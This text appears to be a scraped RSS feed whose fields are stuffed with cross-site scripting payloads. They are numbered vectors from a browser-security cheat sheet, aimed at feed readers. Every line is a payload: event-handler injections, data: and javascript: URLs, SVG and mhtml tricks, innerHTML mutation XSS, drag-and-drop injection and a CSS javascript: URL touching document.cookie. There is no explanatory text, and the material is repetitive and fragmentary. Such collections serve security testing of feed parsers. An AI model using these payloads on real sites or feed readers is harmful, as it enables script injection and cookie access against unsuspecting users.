...
]]>
...
"'`><body onscroll=alert(12)><br><br><br><br><br><br>...<br><br><br><br><input autofocus> ]]>
...
"'`><body onscroll=alert(12)><br><br><br><br><br><br>...<br><br><br><br><input autofocus> ]]>
...
]]>
X
]]>
data:x,%3cscript%3ealert(/guid/)%3c/script%3e
]]>
X
"'`><!DOCTYPE><div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X
]]>
"'`><div id=d><x xmlns="><iframe onload=alert(97)"></div><script>d.innerHTML=d.innerHTML</script>
]]>
X
"'`><!DOCTYPE><div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X
]]>
data:x,%3cscript%3ealert(/guid/)%3c/script%3e
"'`><div id=d><x xmlns="><iframe onload=alert(97)"></div><script>d.innerHTML=d.innerHTML</script>
]]>
X
]]>
data:x,%3cscript%3ealert(/origLink/)%3c/script%3e
-
<![CDATA[Vector 93 - "'`><div style="list-style:url(http://foo.f)\20url(javascript:alert(93));">X
]]>
data:x,%3cscript%3ealert(/link/)%3c/script%3e
javascript:prompt(93)
]]>
X
]]>
data:x,%3cscript%3ealert(/guid/)%3c/script%3e
X
"'`><div style="list-style:url(http://foo.f)\20url(javascript:alert(93));">X
]]>
X
"'`><div style="list-style:url(http://foo.f)\20url(javascript:alert(93));">X
]]>
X
]]>
data:x,%3cscript%3ealert(/origLink/)%3c/script%3e
-
<![CDATA[Vector 94 - "'`><svg xmlns="http://www.w3.org/2000/svg"><handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(94)</handler></svg>
]]>
data:x,%3cscript%3ealert(/link/)%3c/script%3e
javascript:prompt(94)
]]>
alert(94)
]]>data:x,%3cscript%3ealert(/guid/)%3c/script%3e
alert(94)
"'`><svg xmlns="http://www.w3.org/2000/svg"><handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(94)</handler></svg>
]]>alert(94)
"'`><svg xmlns="http://www.w3.org/2000/svg"><handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(94)</handler></svg>
]]>
alert(94)
]]>
data:x,%3cscript%3ealert(/origLink/)%3c/script%3e
-
<![CDATA[Vector 95 - "'`><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><feImage><set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/></feImage></svg>
]]>
data:x,%3cscript%3ealert(/link/)%3c/script%3e
javascript:prompt(95)
]]>
data:x,%3cscript%3ealert(/guid/)%3c/script%3e
data:x,%3cscript%3ealert(/origLink/)%3c/script%3e
-
<![CDATA[Vector 96 - "'`>mhtml:http://html5sec.org/test.html!xss.htmlmhtml:http://html5sec.org/test.gif!xss.html
]]>
data:x,%3cscript%3ealert(/link/)%3c/script%3e
javascript:prompt(96)
]]>
data:x,%3cscript%3ealert(/guid/)%3c/script%3e
mhtml:http://html5sec.org/test.html!xss.htmlmhtml:http://html5sec.org/test.gif!xss.html
]]>
mhtml:http://html5sec.org/test.html!xss.htmlmhtml:http://html5sec.org/test.gif!xss.html
]]>
data:x,%3cscript%3ealert(/origLink/)%3c/script%3e
-
<![CDATA[Vector 97 - "'`><div id=d><x xmlns="><iframe onload=alert(97)"></div><script>d.innerHTML=d.innerHTML</script>
]]>
data:x,%3cscript%3ealert(/link/)%3c/script%3e
javascript:prompt(97)
]]>
]]>
X
]]>X
"'`><div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div><script>with(document.getElementById("d"))innerHTML=innerHTML</script>
]]>X
"'`><div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div><script>with(document.getElementById("d"))innerHTML=innerHTML</script>
]]>X
]]>Drop me
]]>Drop me
"'`><div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"> <h1>Drop me</h1></div><iframe src="http://www.example.org/dropHere.html"></iframe> ]]>Drop me
"'`><div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"> <h1>Drop me</h1></div><iframe src="http://www.example.org/dropHere.html"></iframe> ]]>Drop me
]]>- CrossSiteScripting
]]>
data:x,%3cscript%3ealert(/link/)%3c/script%3e
javascript:prompt(156) ]]> - CrossSiteScripting ]]>
data:x,%3cscript%3ealert(/guid/)%3c/script%3e li {list-style-image: url("javascript:document.cookie=true;"); - CrossSiteScripting "'`><STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting ]]>
- CrossSiteScripting "'`><STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting ]]>
- CrossSiteScripting ]]>